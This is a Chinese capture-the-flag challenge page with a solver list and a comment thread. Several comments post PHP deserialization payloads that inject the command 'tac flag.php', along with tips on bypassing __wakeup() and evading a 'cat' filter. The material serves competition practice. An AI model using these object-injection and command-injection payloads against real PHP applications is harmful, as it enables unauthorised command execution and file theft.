评分(3)
解题动态
blueboat 攻破了该题 1天前
soha 攻破了该题 2天前
hjm123 攻破了该题 3天前
SDLbyZ 攻破了该题 7天前
5883120xly 攻破了该题 9天前
ucole 攻破了该题 13天前
17807032991 攻破了该题 15天前
DZcoming 攻破了该题 15天前
xjuqq 攻破了该题 16天前
ctf88 攻破了该题 20天前
flag与她皆失 攻破了该题 22天前
xiaobai19860830 攻破了该题 24天前
zy07020304 攻破了该题 25天前
凑友希那 攻破了该题 27天前
lplum 攻破了该题 27天前
fanthan 攻破了该题 29天前
秋天在哪 攻破了该题 29天前
Future92 攻破了该题 1月前
猪猪侠开火箭 攻破了该题 1月前
评论
admit 2月前
举报
/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}
iNMB 3月前
举报
此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。
iNMB 3月前
举报
绕过__wakeup()后使用tac等其他输出字符的命令即可
llc123 6月前
举报
c\at flag.php也行
pezn1and 6月前
举报
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
zbss 7月前
举报
备份网站没有文件,环境出问题了吧,退钱,我还试了两次
iamblue 8月前
举报
O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D
tfios 9月前
举报
环境变量里边也有 FLAG
LLTVLL 1年前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 1年前
举报
有哪里提示了username是admin的吗
numberone 1年前
举报
源代码里不是有个if语句:if ($this->username === 'admin')